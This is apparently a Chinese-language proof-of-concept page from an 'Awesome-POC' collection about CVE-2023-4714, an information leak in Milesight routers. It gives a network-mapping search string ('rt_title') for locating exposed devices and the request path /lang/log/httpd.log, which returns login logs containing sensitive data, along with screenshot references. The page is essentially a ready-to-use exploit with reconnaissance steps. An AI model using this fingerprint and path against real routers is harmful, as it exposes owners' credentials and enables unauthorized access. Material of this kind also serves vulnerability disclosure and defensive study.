Awesome-POC/网络设备漏洞/Milesight Router httpd.log 信息泄漏漏洞 CVE-2023-4714.md

29 lines
483 B
Markdown
Raw Normal View History

2024-11-06 14:10:36 +08:00
# Milesight Router httpd.log 信息泄漏漏洞 CVE-2023-4714
## 漏洞描述
Milesight Router 存在信息泄漏漏洞攻击者通过访问httpd.log可以获取登陆敏感日志信息
## 漏洞影响
Milesight Router
## 网络测绘
```
"rt_title"
```
## 漏洞复现
登陆页面
![image-20231116142232135](images/image-20231116142232135.png)
poc
```
/lang/log/httpd.log
```
![image-20231116142246862](images/image-20231116142246862.png)